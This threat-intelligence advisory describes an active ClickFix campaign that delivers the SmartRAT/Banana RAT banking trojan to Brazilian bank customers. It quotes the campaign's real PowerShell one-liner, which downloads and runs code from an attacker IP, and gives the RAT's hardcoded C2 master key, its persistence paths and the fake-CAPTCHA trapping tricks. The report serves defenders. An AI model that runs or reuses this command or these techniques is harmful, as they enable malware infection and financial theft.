# AI-Generated ClickFix Campaign Delivers SmartRAT/Banana RAT PowerShell Banking Trojan Targeting Brazilian Financial Sector

> A financially motivated actor (tracked by Trend Micro as SHADOW-WATER-063) used AI-built typosquatting sites impersonating Brazilian banks and a ClickFix lure (fake Cloudflare CAPTCHA followed by a fullscreen fake BSOD) to coerce victims into running a malicious PowerShell command via Win+R. The chain delivers SmartRAT (internal string SMART_V25; aka Banana RAT) — a PowerShell/C# banking RAT featuring AES-CBC C2, multi-path persistence as MicrosoftEdgeUpdateCore, real-time screen streaming, overlay injection, and PIX/QR transaction manipulation against Brazilian banks, payment platforms, and crypto exchanges.

- **Published:** 2026-06-17T00:00:00Z
- **Last reviewed:** 2026-08-31T01:08:46.950Z
- **Canonical:** https://intel.threadlinqs.com/threat/TL-2026-0841
- **ID:** TL-2026-0841
- **Severity:** HIGH
- **Category:** MALWARE
- **Status:** ACTIVE
- **Actor:** SHADOW-WATER-063 (Brazil)
- **Detections:** 9 · **IOCs:** 30 (full data via the Threadlinqs MCP server — Purple tier)

## Description

Zscaler ThreatLabz and Trend Micro independently documented an active banking-fraud campaign against the Brazilian financial sector first observed in March 2026. Threat actors leveraged AI website-building tools to rapidly stand up convincing typosquatting domains (e.g. cartaobb.com impersonating Banco do Brasil's Cartao BB, crefisa.online, vfsgloball.net). Source-code artifacts — templated AI-style section-header comments and a C2 panel containing verbose explanatory comments and emoticons — indicate large-language-model assistance in both the lure pages and the operator backend.

The delivery uses the ClickFix social-engineering technique. A victim landing on the AI-generated page is shown a fake Cloudflare CAPTCHA on a page that disables DevTools and clears the console. Clicking the CAPTCHA forces the browser fullscreen and renders a fake Windows BSOD/system-recovery prompt. Anti-escape logic (navigator.keyboard.lock(), capture-phase keydown handlers, and window.focus() loops) traps the user while still permitting Win+R, Ctrl+V, and Enter. A PowerShell one-liner is silently placed on the clipboard: powershell "$k8='http://64.95.13.238/st.txt';iex(irm $k8)" with randomized trailing whitespace to defeat hash-based blocking.

Execution retrieves st.txt, which hides its console via ShowWindow(), downloads payload.php from the same host, saves it under the decoy name msedge.txt, and runs it via ScriptBlock::Create(). payload.php Base64-decodes a hardcoded AES key/IV and performs AES-CBC decryption of an embedded blob to reconstruct SmartRAT (identified by the embedded string SMART_V25), which then XOR-decrypts its C2 configuration. The Trend Micro reporting describes a FastAPI-based polymorphic crypter generating 100-200 hash-unique builds per campaign and nine custom PowerShell obfuscation layers.

SmartRAT establishes persistence as MicrosoftEdgeUpdateCore across three privilege paths: a logon-triggered Scheduled Task pointing at %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt (UAC success), an HKCU Run key fallback (UAC denied), and a SYSTEM-level Windows Service compiled in-memory via csc.exe and launched with DuplicateTokenEx / CreateProcessAsUser (elevated). A watchdog respawns every 5 seconds. C2 uses raw TCP on port 51888 plus HTTP (port 80) and TLS (port 443) channels, with AES-CBC (key = SHA-256 of master key iuhbdaubdvauygd5562$3@##$r, HMAC-SHA256 integrity, fresh per-message IV in ivHex:ciphertextHex format) and a binary message-framing protocol. The RAT delivers real-time screen streaming, operator input control, banking-aware overlay injection, QR/PIX transaction tampering, and keylogging, watching window titles for Santander, Bradesco, Itau, Caixa, Banco do Brasil, Nubank, Inter, C6 Bank, Safra, BTG, Sicoob, Sicredi, Mercado Pago, PicPay, PagSeguro, PayPal, Binance, and Mercado Bitcoin.

## MITRE ATT&CK

- T1566 Phishing
- T1566.002 Spearphishing Link
- T1189 Drive-by Compromise
- T1204.001 Malicious Link
- T1059.001 PowerShell
- T1569.002 Service Execution
- T1543.003 Windows Service
- T1053.005 Scheduled Task
- T1547.001 Registry Run Keys / Startup Folder
- T1548.002 Bypass User Account Control
- T1134.001 Token Impersonation/Theft
- T1134.002 Create Process with Token
- T1036 Masquerading
- T1036.005 Match Legitimate Resource Name or Location
- T1070.004 File Deletion
- T1027 Obfuscated Files or Information
- T1140 Deobfuscate/Decode Files or Information
- T1620 Reflective Code Loading
- T1564.003 Hidden Window
- T1082 System Information Discovery
- T1010 Application Window Discovery
- T1056.001 Keylogging
- T1113 Screen Capture
- T1185 Browser Session Hijacking
- T1071.001 Web Protocols
- T1571 Non-Standard Port
- T1573.001 Symmetric Cryptography
- T1008 Fallback Channels
- T1105 Ingress Tool Transfer
- T1659 Content Injection
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
- T1657 Financial Theft
- T1583.001 Acquire Infrastructure: Domains
- T1204.004 User Execution: Malicious Copy and Paste
- T1057 Process Discovery
- T1005 Data from Local System

## Sources

- [ClickFix Campaign Generated by AI Delivers SmartRAT](https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat)
- [Inside SHADOW-WATER-063's Banana RAT: From Build Server to Banking Fraud](https://www.trendmicro.com/en_us/research/26/e/banana-rat.html)
- [Inside SHADOW-WATER-063's Banana RAT (SOC Prime analysis)](https://socprime.com/active-threats/inside-shadow-water-063s-banana-rat-from-build-server-to-banking-fraud/)
- [Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks](https://hackread.com/banana-rat-malware-fake-invoices-16-brazilian-banks/)
- [Hackers Use NF-e Invoice Lures to Deliver Banana RAT Through Malicious Batch Files](https://cybersecuritynews.com/hackers-use-nf-e-invoice-lures/)
- [MITRE ATT&CK T1204.001 User Execution: Malicious Link](https://attack.mitre.org/techniques/T1204/001/)

## Full data

Detection queries (Splunk SPL / Microsoft KQL / Sigma) and IOC values require the Threadlinqs MCP server (Purple tier): https://intel.threadlinqs.com/mcp

Canonical: https://intel.threadlinqs.com/threat/TL-2026-0841
